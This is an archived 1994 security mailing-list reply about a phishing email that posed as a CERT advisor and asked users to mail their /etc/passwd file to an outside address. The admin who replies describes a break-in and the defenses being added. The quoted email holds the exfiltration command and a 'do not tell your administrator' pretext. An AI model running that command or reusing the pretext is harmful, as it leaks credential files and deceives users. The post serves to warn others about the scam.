Re: Another request for passwords

Charles Howes (chowes@helix.net)
Sun, 23 Oct 1994 04:17:40 -0700 (PDT)

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: der Mouse: "Stupid crackers exploiting stupid users"
Previous message: Douglas R. Floyd: "Another request for passwords"
In reply to: Douglas R. Floyd: "Another request for passwords"
Next in thread: Justin J. Lister: "Re: Another request for passwords"

On Sun, 23 Oct 1994, Douglas R. Floyd wrote:

> I got this in the mail today (10-23).

> Seems like someone is knocking on io.com now.
> 
> (The forward to paris is normal as mail gets forwarded there.)
> 
> BEGIN FUNKY MESSAGE --------
> 
> >From vanepp@sfu.ca  Sun Oct 23 00:00:56 1994
> Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
> (931110.SGI/930416.SGI.AUTO)
>         for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
> Received: from trance.helix.net
>         by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
>         id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
> From: vanepp@sfu.ca
> Received: from  (helix.net [142.231.37.2]) by trance.helix.net
> (8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
> dfloyd@pentagon.io.com; Sat, 22 Oct 1994 21:33:23 -0700
> Message-Id: <199410230433.VAA07859@trance.helix.net>
> Date: Sat, 22 Oct 1994 14:22:25
> To: dfloyd@pentagon.io.com
> Subject: Very Important
> Status: RO
> 
> Dear user,
> 
>     It is imperative that I attain your /etc/passwd file
> immediately.  It is for security reasons.  You can mail
> it to me by typing:
> 
>             mail vanepp@sfu.ca < /etc/passwd
> 
> Do not tell your system administrator.  I am
> conducting an investigation on your system.  Thank you
> 
> Your identity will be kept confidential.  I guarantee it
> 
> Thank you for your cooperation.
> 
> Peter Van Epp      Technical Systems Operations
>                    CERT Security Advisor
>                    vanepp@sfu.ca
> 
> 
> END FUNKY MESSAGE -----
> 
> I send cert@cert.org a copy, as well as the admins at io.com.
> 
> I know this was posted earlier, but I think this is another address,
> possibly an MX record as I could not telnet or finger sfu.ca.


Hi.

Yes, someone broke into an account here at Helix, and seems to have a
grudge against one or more people.  Vanepp in particular.

Argh.  This is the third mailbomb.  I'm supposed to be in charge of
security; how do you protect against this??!?

We're using shadow passwords as of tonight, and tcp wrappers as of
last month.  The bugger keeps signing on via modem, and this is a
problem.  We can't afford callerid.

--
Charles Howes -- chowes@helix.net
 Always tell the truth, then you make it the other bloke's problem! 
 - Sean Connery, 1971

Next message: der Mouse: "Stupid crackers exploiting stupid users"
Previous message: Douglas R. Floyd: "Another request for passwords"
In reply to: Douglas R. Floyd: "Another request for passwords"
Next in thread: Justin J. Lister: "Re: Another request for passwords"